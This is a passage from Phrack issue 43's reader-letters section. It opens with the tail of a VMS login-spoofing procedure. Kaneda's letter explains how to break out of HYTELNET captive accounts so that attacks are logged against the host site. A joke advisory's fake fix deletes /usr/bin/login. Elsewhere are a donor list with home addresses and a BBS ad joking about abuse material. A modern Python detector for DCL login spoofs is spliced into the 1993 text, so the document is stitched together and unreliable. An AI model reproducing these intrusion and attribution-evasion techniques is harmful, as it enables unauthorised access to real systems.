$close io2
$@login2
$delete login2.com;*
$exit

[Editor: Thanks for the letter and program. I wish I could bring myself to use a VMS and try it out. :) Always happy to get notice that somewhere out there a female reads Phrack. By the way, "innocent female" is an oxymoron.]

****************************************************************************

To: Phrack Loopback.
From: White Crocodile.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Greetings sweet Phrack and Mr. Bloodaxe. Your "loopback reports" is really cool invention and I (sorry for egoisthic "I") with pleasure wasting time for his reading ( ex. my playboy time ). But here for some unknown reason appear equal style, and all loopback remind something medium between "relations search" [Hello Dear Phrack, I am security expert of our local area, but when I looked to output of "last" program (oh,yeah - "last" it is ...), I ocassionaly understanded what apparently someone elite hacker penetrated into my unpassworded account! But how he knew it??? I need to talk with him! Please mail me at security@...] and "make yourself" [Yep.I totally wrote program which gets file listing from target vicitim's home directory in current host. After that I decided to contribute it for You. I hope this will help. Here is the complete C code. "rx" permission in target's '$HOME' required.]. Looking similar articles like "... off Geek!" and various reports which don't reacheds PWN. [CENSORED BY ME]. Resulting from abovewritten reason and I let myself to add some elite (oops word too complex), some bogus and little deposit to Your lb.
He written in classic plagiarize style.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

* * *

Good mornin' Ladys and Gentelmen! I hacking and phreaking. I know what it is horrible (don't read it please - this message to Bart), but I doing it all the time (today already 3 month). I have not much time to write, and here is the subject - I broke into one military computer and stole their mail about new security bug!!! l00k f3r |t:

- - -

DDN & CERT SPECIAL REPORT*
Sun 3.x,4.1.x login flaw

Subject: The huge Sun 4.x login hole.(possibly Ulitix 3.0,BSD,AIX and many yet unknown systems)

Impact: Allow random intruders to gain "root" access.

Description: The huge security hole was there and waiting! Type:

$ login root [ no option required ], and You are!

All what You need to know its just root's password, but it (pw), sure, can be easily obtained from real root, by asking him (root). Ex - "$ talk root"

Possible fix until copyrighted patch come out:

#rm /usr/bin/login
#cp /usr/games/fortune /usr/bin/login

If you believe that your system has been compromised, contact CERT CC. Call our hotline 900-FBI-PRIVATE (24 a day,please not in dinner time or in time of "Silence of the Lamb"), leave Inet address of your system and number of private credit card.

- - -

* Report not will be printed in cert advisories in this form, becouse FBI need remove all hints and tips, and make him useless to intruders.

DISCLAIMER: Above document written by CERT, DDN and FBI - all pretension to them.

Thanks to gr*k (I can't write his full name for security reasons),roxtar, y0,Fidelio,2 scotts from Santafe,KL (He not have attitude towards this mail,but I included him for polite since he reserved tickets for me to SUMMERCON),ahh,x0d,all zero's (count,bob,nick,etc.) and many others for hints to me, what this bug really exist (Yep, before I stoled report).

- Write You later - anonymous.

P.S. Yup! If You won't think what I am toady - I wanna say also thanks to TK and sure Erik Bloodaxe.
And also - IF after E911 incident you are more carefully, feel free to replace "stole" to "got" (when you'll post it), and do not forget to add "reprinted with permission".

- Sincerely, anonymous.

----------------------------------------------------------------------

[Editor: More indications that we will all be raided by the DEA more often than the FBI in coming years.]

*****************************************************************************

"Since my probation status forces me to be adamant about this. Illegal activities on Netsys cannot and will not be tolerated. Prison sucked."
- Len Rose 06/6/93

NETSYS COMMUNICATION SERVICES
Palo Alto, California

Netsys is a network of large Sun servers dedicated to providing Internet access to individuals and corporations that need solid, reliable Internet connectivity. Netsys is at the hub of major Internet connectivity.

Netsys is a system for professionals in both the Internet and Unix community. The public image is important to us. Illegal activities cannot be tolerated.

Netsys has every feature you could possibly need.

Netsys is lightly loaded, extremely reliable and dedicated to providing full time 24 hour Internet access.

Support: 24 hour emergency response service.

Dialups: Palo Alto area, High Speed (V.32 and PEP)

Private Accounts: $20 monthly ( with file storage capacity of 5 megabytes)
                  $1 per megabyte per month over 5 megabytes.

Commercial Accounts: $40 monthly (file storage capacity of 10 megabytes)
                     $1 per megabyte per month over 10 megabytes.

Newsfeeds: We offer both nntp and uucp based newsfeeds , with all domestic newsgroups, and including all foreign newsgroups.

SPECIAL FEATURES THAT NO ONE ELSE CAN PROVIDE

Satellite Weather: Netsys has available real time satellite weather imagery. Images are available in gif, or Sun raster format. Contact us for NFS mirroring, and other special arrangement. These images are directly downlinked from the GOES bird. Contact Steve Eigsti (steve@netsys.com)

Satellite Usenet: Netsys is offering Pagesat's satellite newsfeed service for large volume news distribution. Members of Netsys can obtain substantial discounts for the purchase and service costs of this revolutionary method of Usenet news distribution. Both Unix and MS Windows software available. Contact (pagesat@pagesat.com) for product information.

Paging Services: Netsys is offering Pagesat's Internet to Pager mail service. Members of Netsys can obtain critical email to pager services. Pagesat has the ability to gateway any critical electronic mail to your display pager.

Leased Line Internet Connections

Pagesat Inc. offers low cost 56k and T1 Internet connections all over the United States. Since Pagesat is an FCC common carrier, our savings on leased lines can be passed on to you. For further information, contact Duane Dubay (djd@pagesat.com).

We offer other services such as creating domains, acting as MX forwarders, and of course uucp based newsfeeds.

Netsys is now offering completely open shell access to Internet users. For accounts, or more information , send mail to netsys@netsys.com

Netsys will NEVER accept more members than our capacity to serve.

Netsys prides itself on its excellent connectivity (including multiple T1's, and SMDS), lightly loaded systems, and its clientele.

We're not your average Internet Service Provider. And it shows.

--------------------------------------------------------------------

[Editor: We here at Phrack are forever in debt to Mr. Len Rose for allowing us to use ftp.netsys.com as our new official FTP site after getting the boot off EFF. It takes a steel set of huevos to let such an evil hacker publication reside on your hard drive after serving time for having dealings with evil hackers. We are STOKED! Thanks Len! Netsys is not your average site, INDEED!]
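
The DCL login-spoofing procedure printed earlier in this Loopback relies on a handful of fixed constructs: a loopback SET HOST 0, its own "Username: " prompt and "User authorization failure" text, SET MESSAGE with everything switched off, and a SHOW symbol redefined to run a command procedure. The Python scanner below is an added example (not part of the letter or of Phrack) that flags those constructs in a DCL command procedure such as a user's LOGIN.COM; the rule names, the watched-verb list and both sample inputs are constructed for illustration.

```python
import re

# DCL verbs worth watching: a symbol with one of these names (or an
# abbreviation of it) whose value starts with "@" replaces the real command
# with a command procedure. The list is an assumption; extend it per site.
WATCHED_VERBS = ("SHOW", "DIRECTORY", "LOGOUT", "TYPE")

# "$name ==" / "$na*me :==" followed by a value that begins with "@".
# Unanchored on purpose: it also matches the assignment when it sits inside
# a quoted string that the procedure writes into a rebuilt login file.
HIJACK = re.compile(r'\$\s*([A-Za-z_][\w*]*)\s*:?==?\s*"*\s*@')

RULES = {
    # SET HOST 0 logs back in to the local node
    "loopback_login": re.compile(r'\bset\s+host(?:/\w+)*\s+0\b', re.I),
    # a user procedure drawing its own login prompt
    "fake_login_prompt": re.compile(
        r'\bread\b.*?/prompt\s*=\s*"\s*(?:username|password)\s*:', re.I),
    # the system's failure text reproduced by a procedure
    "fake_login_text": re.compile(r'user authorization failure', re.I),
    # error messages switched off while files are being shuffled
    "message_suppression": re.compile(
        r'\bset\s+mess\w*\s*(?:/\w+)*?/no(?:facility|severity|text|identification)',
        re.I),
}


def strip_comment(line):
    """Drop a DCL comment: '!' starts one unless it is inside a quoted string."""
    in_quote = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_quote = not in_quote  # a doubled "" toggles twice, state is kept
        elif ch == '!' and not in_quote:
            return line[:i]
    return line


def scan_dcl(text):
    """Return (line number, rule name, line) for every suspicious construct."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = strip_comment(raw).strip()
        if not line:
            continue
        for m in HIJACK.finditer(line):
            name = m.group(1).replace("*", "").upper()  # SH*OW -> SHOW
            if len(name) >= 2 and any(v.startswith(name) for v in WATCHED_VERBS):
                findings.append((lineno, "verb_hijack", line))
                break
        for rule, rx in RULES.items():
            if rx.search(line):
                findings.append((lineno, rule, line))
    return findings


def verdict(findings):
    """A hijacked verb plus any other indicator is treated as a likely spoof."""
    rules = {rule for _, rule, _ in findings}
    if "verb_hijack" in rules and len(rules) >= 2:
        return "likely login spoof"
    return "review" if rules else "clean"


# Constructed sample: individual lines copied from the procedure in the letter.
SAMPLE = "\n".join([
    '$! constructed sample',
    '$write io "$set host 0"',
    '$write io user + "/COMMAND=INSTAAR_DEVICE:[MILLER_G]FINDNEXT"',
    '$wo "User authorization failure"',
    '$read/time_out=1/prompt="Username: " sys$command io',
    '$set message/nofacility/noseverity/notext/noidentification',
    '$show = ""',
    '$show == "@instaar_device:[MILLER_G]findnext show"',
    '$write io2 "$sh*ow == ""@instaar_device:[miller_g]findnext show""',
    '$set message/facility/text/severity/identification',
])

# Constructed benign login procedure: ordinary symbol definitions and comments.
BENIGN = "\n".join([
    '$! set host 0 appears only in this comment',
    '$dir*ectory == "directory/size/date"',
    '$wo = "write sys$output"',
    '$wo "Welcome back!"   ! greeting',
])

if __name__ == "__main__":
    for lineno, rule, line in scan_dcl(SAMPLE):
        print(f"{lineno:3} {rule:20} {line}")
    print(verdict(scan_dcl(SAMPLE)), "/", verdict(scan_dcl(BENIGN)))
```

A static scan like this misses symbols assembled by string concatenation at run time, so it complements rather than replaces checking the live symbol table of a session.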
****************************************************************************

Something Phrack might like to see:

The contributors to and practices of the Electronic Frontier Foundation disclose quite accurately, just who this organization represents. We challenge the legitimacy of the claim that this is a "public interest" advocate. Here is a copy of their list of contributors:

[FINS requested the Office of the Attorney General of the Commonwealth of Massachusetts to provide us with a list of contributors of over $5000, to the Electronic Frontier Foundation, required by IRS Form 990. Timothy E. Dowd, of the Division of Public Charities, provided us with a list (dated January 21, 1993), containing the following information. No response was given to a phone request by FINS directly to EFF, for permission to inspect and copy the most current IRS Form 990 information.]

ELECTRONIC FRONTIER FOUNDATION, INC.
IRS FORM 990. PART I - LIST OF CONTRIBUTIONS

NAME AND ADDRESS OF CONTRIBUTOR         CONTRIBUTION
                                        DATE        AMOUNT

Kapor Family Foundation
C/O Kapor Enterprises, Inc.
155 2nd Street
Cambridge, MA 02141                     Var         100,000

Mitchell D. Kapor
450 Warren Street
Brookline, MA 02146                     Var         324,000

Andrew Hertzfeld
370 Channing Avenue
Palo Alto, CA 94301                     12/12/91    5,000

Dunn & Bradstreet
C/O Michael F. ...
1001 G Street, NW Suite 300 East
Washington, DC 20001                    02/12/92    10,000

National Cable Television
1724 Massachusetts Avenue, NW
Washington, DC 20036                    02/18/92    25,000

MCI Communications Corporation
1133 19th Street, NW
Washington, DC 20036                    03/11/92    15,000

American Newspaper Publishers Association
The Newspaper CTR
11600 Sunrise Valley
Reston, VA 22091                        03/23/92    20,000

Apple Computer
20525 Mariani Avenue MS:75-61
Cupertino, CA 95014                     03/23/92    50,000

Sun Microsystems, Inc
c/o Wayne Rosing
2550 Garcia Ave
Mountain View, CA 94043-1100            04/03/92    50,000

Adobe Systems, Inc.
c/o William Spaller
1585 Charlestown Road
Mountain View, CA 94039-7900            04/16/92    10,000

International Business Systems
c/o Robert Carbert, Rte 100
Somers, NY 10589                        05/07/92    50,000

Prodigy Services Company
c/o G. Pera...
445 Hamilton Avenue
White Plains, NY 10601                  05/07/92    10,000

Electronic Mail Associates
1555 Wilson Blvd. Suite 300
Arlington, VA 22209                     05/13/92    10,000

Microsoft
c/o William H. Neukom
1 Microsoft Way
Redmond, VA 98052                       06/25/92    50,000

David Winer
933 Hermosa Way
Menio Park, CA 94025                    01/02/92    5,000

Ed Venture Holdings
c/o Ester Dvson
375 Park Avenue
New York, NY 10152                      03/23/92    15,000

Anonymous                               12/26/91    10,000

Bauman Fund
c/o Patricia Bauman
1731 Connecticut Avenue
Washington, DC 20009-1146               04/16/92    2,500

Capital Cities ABA
c/o Mark MacCarthy
2445 N. Street, NW Suite 48
Washington, DC 20037                    05/04/92    1,000

John Gilmore
210 Clayton Street
San Francisco, CA 94117                 07/23/91    1,488
                                        08/06/91    100,000

Government Technology                   10/08/91    1,000

Miscellaneous                           04/03/91    120

Apple Writers Grant
c/o Apple Computer
20525 Mariani Avenue                    01/10/92    15,000

[Editor: Well, hmmm. Tell you guys what: Send Phrack that much money and we will give up our ideals and move to a new location, and forget everything about what we were all about in the beginning. In fact, we will turn our backs on it. Fair? I was talking about me moving to Europe and giving up computers. Don't read anything else into that. Nope.]

****************************************************************************

-----BEGIN PGP SIGNED MESSAGE-----

Q1: What cypherpunk remailers exist?
A1:

 1: hh@pmantis.berkeley.edu
 2: hh@cicada.berkeley.edu
 3: hh@soda.berkeley.edu
 4: nowhere@bsu-cs.bsu.edu
 5: remail@tamsun.tamu.edu
 6: remail@tamaix.tamu.edu
 7: ebrandt@jarthur.claremont.edu
 8: hal@alumni.caltech.edu
 9: remailer@rebma.mn.org
10: elee7h5@rosebud.ee.uh.edu
11: phantom@mead.u.washington.edu
12: hfinney@shell.portal.com
13: remailer@utter.dis.org
14: 00x@uclink.berkeley.edu
15: remail@extropia.wimsey.com

NOTES:
#1-#6       remail only, no encryption of headers
#7-#12      support encrypted headers
#15         special - header and message must be encrypted together
#9,#13,#15  introduce larger than average delay (not direct connect)
#14         public key not yet released
#9,#13,#15  running on privately owned machines

======================================================================

Q2: What help is available?

A2: Check out the pub/cypherpunks directory at soda.berkeley.edu (128.32.149.19). Instructions on how to use the remailers are in the remailer directory, along with some unix scripts and dos batch files.

Mail to me (elee9sf@menudo.uh.edu) for further help and/or questions.

======================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.2

iQCVAgUBLAulOYOA7OpLWtYzAQHLfQP/XDSipOUPctZnqjjTq7+665MWgysE1ex9
lh3Umzk2Q647KyqhoCo8f7nVrieAZxK0HjRFrRQnQCwjTSQrve2eAQ1A5PmJjyiI
Y55E3YIXYmKrQekIHUKaMyATfnhNc6+2MT8mwaWz2kiOTRkun/SlNI3Cv3Qt8Emy
Y6Zv0kk/7rs=
=simY
-----END PGP SIGNATURE-----

[Editor: We suggest that everyone go ahead and get the info file from soda.berkeley.edu's ftp site. While you are there, take a look around. Lots of groovy free stuff.]

==Phrack Magazine==

Volume Four, Issue Forty-Three, File 3 of 27

Phrack Loopback Part II

======================================================================
ToneLoc T-Shirt Offer
======================================================================

Yes, the rumors are true: A ToneLoc t-shirt is at last available.
The shirt is an extra large, 100% cotton Hanes Beefy-T, silk screened with four colors on front and eight colors on back.

The front features an "anti-bell" logo, with your favorite corporate symbol in blue under a slashed circle in red. The ToneLoc logo appears above, with an appropriate quote below.

The back has six Tonemaps, visual representations of exchange scans, contributed by ToneLoc'ers from around the globe. The exchange and scanner's handle is printed below each Tonemap. The handles of the beta testing team are listed below the maps.

If you act now, a free copy of the latest release of ToneLoc will be included with your order! Please specify 3.5" or 5.25" disks.

$15 postpaid; add $5 for international orders. Make your check or money order payable to "ToneLoc Shirt." Send to:

ToneLoc Shirt
12407 Mopac Expwy N #100-264
Austin, TX 78758

Voice Mail (24 hours): 512-314-5460

- Mucho Maas
- Minor Threat

[Editor: I have one of these. The only hacker program immortalized in cotton. Nifty!]

******************************************************************************

The return of a telecom legend...

S O U T H W E S T

A Neon Knights/Metal Communications Experience

cDc      _   _
        ((___))
        [ x x ]      cDc
         \   /
cDc      (' ')
          (U)

'..and none but the Bovine survived the onslaught'

-cDc- CULT OF THE DEAD COW -cDc-
cDc communications
-cDc- D0PE SYSTEM -cDc-
---------------------------
Very K-Rad   713-468-5802   No Lame Ratios
Running Baphomet   Sysd00d : Drunkfux   86,400 Seconds A Day
OoOOooOdlez o' T-Files   The Official HoHoCon BBS   New Pimping Tips Every Day
Tonz o' Nifty Ascii Pictures   Talk To Satan Himself.. Live!!   Free 5-Digit Metro K0DEZ For All
d0Pe Gifs Of Gail Thackeray Online   Read Hate Filled Nazi Skinhead Poemz
Home Of K-RAP : The K-Rad Ascii Possee   Learn How To Make Money! Just Ask Byron!
Necropheliacs & Kidporn Kollekt0rz Welcome   Y0 Y0 Y0 Lonely D00dz! We gotz girlie uzerz!
Lots Of Message Bases With Really K-KeWL Names   Is This Whole "Volcano Ad" Thing Stupid Or What?
GNU Warez From The Future! We Have A Time Machine!   I Think We Have One Of Those Big, EL8 Drive Thingies
No Net Access? Submit Your cDc & Phrack Articles Here!   The Only System Authorized By The Debbie Gibson Fan Club
The Neon Knights Did NOT Die, We Just Went Way Underground   This Thing Is Starting To Look Like That Album St0nerzz Like
Mega KooL Games Like Lemonade Stand And Hunt The Wumpus Deluxe   Hey! It's The Mashed Potato Mountain Thing From Close Encounters
Users Include Lots Of Elite Peoplez You See On Shows Like Dateline   That Really Trendy Super High Speed Modem All Those Warez DooDz Have
cDc / CuD / dFx / Neon Knights / NIA / Phrack / uXu / Video Vindicator
Telco / Systems / Networks / Security / Cellular / Satan / Death / K0DEZ

***************************************************************************

Hi there!

As a beginner in Cyberspace & a new reader of Phrack, I just wanna say thiz... IT'S X-CELLENT DUDES!!!!!. Keep the good work!!!!!. I only have your latest issue, and I never read previous ones, so this is maybe old stuff... but I would like to see the Infonet network and Datapac covered in some of UR articles... let me know if u published something in recent issues.

Greetings from South America,

LawEnforcer. (yes, it's an Alias!!!)

[Editor: Well, InfoNet we've never done. Any takers? Datapac I personally scanned some time ago, but almost ALL of the 100K of NUA's I found still work. Maybe someone should take my script and re-scan it. Anyone? Class? Bueller?]

****************************************************************************

begin contribution-------------------------------

VMS machines that have captive accounts often have accounts such as HYTELNET. This is an account which will archie for you, or take you to a few select BBSs or any of many boring things to do. You simply log in as HYTELNET, there isn't a password, and go through the menus.
Now, that's where the fun begins. If you use HYTELNET to telnet anywhere, while it is connecting, simply type your local telnet escape key (something like ^\ or ^]) and then........you have a telnet prompt. Unfortunately, if you close or disconnect, it will return to the HYTELNET menus, and you can't open a new connection, since you're already connected. So, what you do is SPAWN whatever process you want.....you could SPAWN TELNET or SPAWN FTP or SPAWN anything else for that matter. SPAWN with no arguments (the shell escape) does not work, however. This works from any captive account that telnets. So, you can telnet to a VAX that has HYTELNET, log in as HYTELNET, do what I told you, and then hack to wherever, since the reports from the target site will show that HYTELNET@insert.vax.site committed the heinous crimes that you did.

Kaneda

end contribution--------------------------------

[Editor: Kaneda: thanks for that tidbit. Now I'm sure to get grief on IRC from someone coming from an odd site. :) Give my regards to Tetsuo. "But some day...we will be"]

****************************************************************************

   _   _
  ((___))
  [ x x ]   cDc communications
   \   /    Global Domination Update
   (' ')    #12 - April 1st, 1993
    (U)
Est. 1986

New gNu NEW gnU new GnU nEW gNu neW gnu nEw releases for April, 1993:

_________________________________/Text Files\_________________________________

221: "Sickness" by Franken Gibe. Paralyzed by thoughts. Rage! Fight! Dark!

222: "A Day in the Life of Debbie G1bs0n" by The Madwoman. The pop idol faces her arch enemy on the fields of ninja combat and in the arms of love.

223: "The B!G Envelope Stuffing Scam" by Hanover Fiste. How to get money. Make Sally Struthers proud of you.

224: "The Bird" by Obscure Images. Story 'bout a sad guy who laughs at birds. It's depressing. Oi's a kooky guy.

225: "Tequila Willy's Position Paper" by Reid Fleming and Omega.
Unknown to most, Tequila Willy threw his hat in the ring for the 1992 presidential election. Here's the paper detailing his positions on all the important issues. Better luck in '96, eh?

226: "Simple Cryptology" by Dave Ferret. Introductory guide to cryptology which also includes a good list of other sources to look into.

227: "Big Ol' Heaping Pile of Shit" by Suicidal Maniac. Buncha poems about lots of things. Wacky.

228: "ISDN: Fucking the Vacuum Cleaner Attachments" by Reid Fleming. Intended for _Mondo 2000_, this file drops science about everyone's favorite future phone system.

229: "The Evil Truth About Peter Pan" by Lady Carolin. It's a whole mess of things you and your puny little mind might not have noticed about this popular kiddie (hah!) story.

230: "The 2:00 O'Clock Bus" by Tequila Willy and Bambi the Usurper. Geriatric porn with some doggy flavor.

_____________________________/Other Stuff to Get\_____________________________

From: cDc communications/P.O. Box 53011/Lubbock, TX 79453

This is Swamp Ratte's stuff:

All the cDc t-files on disk by mail, for convenience sake! Specify MS-DOS or Apple II format 3.5" disks. $3.00 cash.

cDc stickers! Same design as were flying around at HoHoCon, with the scary-lookin' cow skull. k00l. Send a SASE and 50 cents for a dozen of 'em (or just send a dollar).

Weasel-MX tape! _Obvious_ 45-minute cassette. This is Swamp Ratte's funk/punk-rock/hip-hop band. It's a mess, but fun. $3.00 cash.

cDc hat! Yeah, get yer very own stylin' black baseball cap embroidered with the cDc file-header-type logo on the front in white. This isn't the foam-and-mesh cheap kind of hat; it's a "6-panel" (the hat industry term) quality deal. Roll hard with the phat cDc gear. $15.00 plus a buck for postage.

_Swingin' Muzak_ compilation tape! An hour of rockin' tuneage from Weasel-MX (all new for '93), Counter Culture, Acid Mirror, Truth or Consequences, Grandma's V.D., and Sekrut Squirrel. Lotsa good, catchy, energetic stuff for only $5.00 cash.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

From: FNORD! Publications/2660 Trojan Dr. #912/Green Bay, Wisconsin 54304-1235

This is Obscure Images' stuff:

FNORD! 'zine #1 & #4 - $2.00 Each
Shoggoth 912 #1 - $0.75

For some snarly techno grooves, send away for the new tape from Green Bay's finest (and only) technorave sensation, I OPENING!

IO-Illumination Demo Tape (7 songs of joy) - $5.00

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

From: Freeside Orbital Data Network/ATTN:dFx-HoHoCon-cDc/11504 Hughes Road #124 Houston, TX 77089

This is Drunkfux's stuff:

HoHoCon '92 T-Shirts : Black : XL : Elite : Stylish : Dope : Slammin'

Only $15 + $2 shipping ($2.50 for two shirts). Your choice of either "I LOVE FEDS" or "I LOVE WAREZ" on front, where "LOVE" is actually a red heart, ala "I LOVE N.Y." or "I LOVE SPAM." On the back of every beautimus shirt is...

dFx & cDc Present
HOHOCON '92
December 18-20
Allen Park Inn
Houston, Texas

HoHoCon '92 VHS Video : 6 Hours : Hilariously Elite : $18 + $2 Shipping

Please make all checks payable to O.I.S. Free cDc sticker with every order! w0w!

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

From: Bill's Shirt Thing/P.O. Box 53832/Lubbock, TX/79453

This is Franken Gibe's stuff:

AIDS sucks! Order a catalog! Nifty t-shirts that make you happy. Proceeds go to local AIDS Resource Center. Send a $0.29 stamp for the cat'.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

From: Teach Me Violence magazine/61 East 8th St./Suite 202/New York, NY 10003

This is The Pusher's stuff:

Teach Me Violence 'zine:
Issue #1 (Mr. Bungle, COC, Murphy's Law)
Issue #2 (Helmet, Supertouch, Agnostic Front, American Standard)
Issue #3 (Faith No More, Chris Haskett, Cathedral, Iceburn, Venom)
$3.00 cash each

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

From: A Day In The Life Of.../P.O. Box 94221/Seattle, WA 98124

This is Lady Carolin's stuff:

A Day In The Life Of... 'zine, free with two stamps.
Bi-monthly contact list of girlie bands/grrrl bands/female vocalists. $1.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

__________________________________/cDc Gnuz\__________________________________

"cDc: savin' trees in '93"

Hiya once again, here's whassup:

NEW Internet FTP site: zero.cypher.com. This is Drunkfux and Louis Cypher's chilly-the-most deal. Login as "anonymous" and get all the cDc stuph fast fast fast.

NEW cDc Mailing list: Get on the ever-dope and slamagnifiterrific cDc mailing list! Send mail to cDc@cypher.com and include some wonderlessly elite message along the lines of, "ADD ME 2 DA MAILIN LIZT!!@&!"

NEW Official cDc Global Domination Factory Direct Outlets:

Cyberspace.Nexus            +31-67-879307 [Belgium]
Mirrorshades BBS            903/668-1777
The Ministry of Knowledge   401/043-3446
The Crowbar Hotel           713/373-4031

We're always taking t-file submissions, so if you've got a file and want to really get it out there, there's no better way than with cDc. Upload text to The Polka AE, or my Internet address, or send disks or hardcopy to the cDc post office box in Lubbock, TX.

NEW updated CDCKC0W.TXT file. All the information for sysops to get going running Factory Direct Outlets. It should be available from wherever you got this Update.

NEW CDCV9.ZIP is out containing cDc t-files 201-225. Factory Direct Outlet sysops should get this and put it up on their systems.

See ya in May.

S. Ratte'
cDc/Editor and P|-|Ear13zz |_3@DeRrr
"We're into t-files for the girlies and money."

Write to: cDc communications, P.O. Box 53011, Lubbock, TX 79453.
Internet: sratte@cypher.com, sratte@mindvox.phantom.com.

[Editor: Whew. Any word on those cDc Glow in The Dark Toilet Seat Covers? I've got my 29.95 ready!]
****************************************************************************

Hey there

a few of us use this account and would like to get phrack sent to us here if at all possible... :)

We are all Australians and all read your magazine to death.. a friend of mine runs a board called shred til ya ded which is basically a hpac and warez assortment... nothing 0 day but definitely good for hacking info... we are in the middle of getting all of your mags online at the moment

you mentioned in phrack 42 that you would like people from other countries to write pieces about the scene there... well depending on the kind of thing you want i would be more than happy to give it a go with some mates

thanks

Darkstar

[Editor: Darkstar and anyone else--send me your files about your scenes in other countries. Nearly everyone who promised me a file about their country flaked out. You'll see who did send me a file later in this issue. Other countries: get off your duffs and send me a file! We want to know what goes on there! Boards, Busts, History, Hackers, Hangouts, Groups, Greats, Legends, Lore, EVERYTHING!]

***************************************************************************

I remember seeing a message somewhere on the WELL saying an issue of Phrack carried listings of Viruses. Could you tell me which one(s)? Also, do you know of any sites which have virus listings archived ?

Thanks,

Jon Barber

[Editor: Well, John, Phrack doesn't carry virii info. You might check around for 40hex. Personally, I think virii are vastly overrated hype driven onward by McAfee and other self-serving interests. That is why we ignore them. (That is also why I don't mention them when I lecture on computer security...they are no big thing.)]

****************************************************************************

Ok, So I was reading Phrack 42's listing for SprintNET nodes... But there was no information on how to access it.. What are the ACNS For the Sprintnet?
Is there a Phrack out that details use of the SprintNET.. Would appreciate ANY and ALL, as I've never heard of it being used widely like the Internet, and would like to know how to use it..

Jack Flash...

[Editor: Jack...you kids are spoiled. You and your Internet. Hrumph. Remember when Arpanet was like a 20 or so Universities and Contractors, and tied to about 100 bases thru Milnet? No? Sheesh.

To answer your question, Sprintnet (used to be Telenet, and always will be to me) is a public packet switched network. It can be accessed in nearly EVERY city in the USA, and in many large cities in other countries.

The Toll-Free dialups are:

300-2400:   800-546-1000
9600 v.32:  800-546-2500

At the TERMINAL= prompt, type D1. Then to find a local dialup, at the @ prompt type MAIL. Login as username PHONES password PHONES.]

*****************************************************************************

RE: Loop-Back

I was wondering if it would be possible for you to do something on Novell LAN security, as we have one at my high school. I was also wondering about bluebox tones...in my area, if you call into the next county, sometimes you hear what sounds like bluebox tones. I had thought these lines were digital, and therefore, would not require tones of any type.. any ideas?

RF Burns

[Editor: As for the Novell...check later in this issue. As for the MF tones...when calls go from one area to another it is quite common to hear multi-frequency tones. Depending upon the way the call is routed, your particular pick of LD carrier and the equipment between you and the destination, you may hear these tones. You may even be one of the lucky ones, and be able to seize a trunk. Using certain LD carriers you can still box, but usually you are stuck with a trunk that can't get out of the area. Alas.]

*****************************************************************************

Hi - I'm a student in the MLS program here at SUNY Albany.
I found out about Phrack while researching a paper for my public policy class, on the ECPA and shit. Well, I gave a fabulous 45-minute presentation on it all and then wrote an even better paper for which I was rewarded with an A as well as an A for the class. Turns out John Perry Barlow and Mitch Kapor are heroes of my professor as well. So now I'm hooked. For my thesis I'm writing a user manual for librarians on the Internet and helping teach a class in telecommunications. Just wanted to let you phrack-types know you're my heroes and I want to be a member of the phrack phamily. Can't send any money, though. *:( Keep the faith, hopey t [Editor: That's really great! Usually profs are terribly anal about anything regarding Phrack and/or hacking. You are very lucky to have had such an instructor. Congrats on the class and good luck with your thesis!] **************************************************************************** Hi! I was just glancing through Phrack #42, and read the portion that sez that all computer professionals (essentially) have to delete this and even old copies of Phrack. Coupla questions: I'm a Network Administrator for a University, do I have to comply? It's not like I am a thug from Bellcore or anything like that. Although one of the things I am concerned with, professionally, is the security of our systems, I am no Cliff Stoll. If I were to catch an unauthorized visitor, I would give him the boot, not chase him down with prosecution in mind. I have, of course, deleted all my old Phracks as well as #42, but I would like to be able to re-snarf them. Let me know... Thanks! Dan Marner [Editor: Well, Dan, technically Phrack could quite possibly be beneficial to you and assist you with your career, and this is the typical scenario in which we request that you register your subscription and pay the registration fee. Of course, we don't have the SS as our own personal thugs to go break your legs if you don't comply. 
:) You might at least try to get your employer to pay for the subscription. As far as issues prior to 42 go, KEEP THEM! They are exempt from anything, and are arguably public domain.] ***************************************************************************** Hey, I need to get in touch with some Macintosh phreakers. Know any? Anyway, are there any good war dialers or scanners out there for Macintosh? I need something that picks up PBXs and VMBs as well as Carriers. Thanx in advance... [Editor: I personally avoid the little toadstools like the plague, and I was unable to get a hold of the only hacker I know who uses one. If anyone out there on the net could email us with the scoop on Mac hacking/phreaking utilities it would be most appreciated.] ***************************************************************************** Hello! I was just wondering if you knew of any FidoNet site that carries back issues of phrack. The main reason behind this, as my link through the Internet is basically through a FidoNet-type network and I am unable to ftp files. Any help would be appreciated! Thanks! Jason K [Editor: Phrack pops up everywhere. I would be very surprised if it wasn't on a ton of fido sites. However, I have no idea of what those sites may be. If anyone knows of any, let us know!] **************************************************************************** Can you give me the email address for the 2600 Magazine or whomever the person in charge. I've no idea how to contact them, so that's why I'm asking you. I'm much obliged. Thanks, MJS [Editor: 2600 magazine can be reached at 2600@well.sf.ca.us To subscribe send $21 to 2600 Subscriptions, P.O. Box 752, Middle Island, NY, 11953-0752. To submit articles write to 2600 Editorial Dept., P.O. Box 99, Middle Island, NY, 11953-0099. Note: If you are submitting articles to 2600 and to us, please have the courtesy of LETTING BOTH MAGAZINES KNOW IN ADVANCE. Ahem.] 
****************************************************************************

Do you know if there has been a set date and place for the next HoHoCon?

Best Regards,

Mayon

[Editor: Actually, it's looking more and more like HoHoCon will be
 December 17, 18, 19 in Austin, TX. It may still be in Houston, but
 methinks the Big H has had about enough of dFx. We'll let you know when
 we know for sure.]

****************************************************************************

Reporter for major metro paper is interested in help finding out anything
there is to find on four prominent people who have volunteered to have
their privacy breached.

Financial fundamentals. Lives of crime. Aches and pains. How rich they
are, where they vacation, who they socialize with. You name it, we're
interested in seeing if it's out there.

All for a good cause.

If you're willing to advise this computer-ignorant reporter, or dig in and
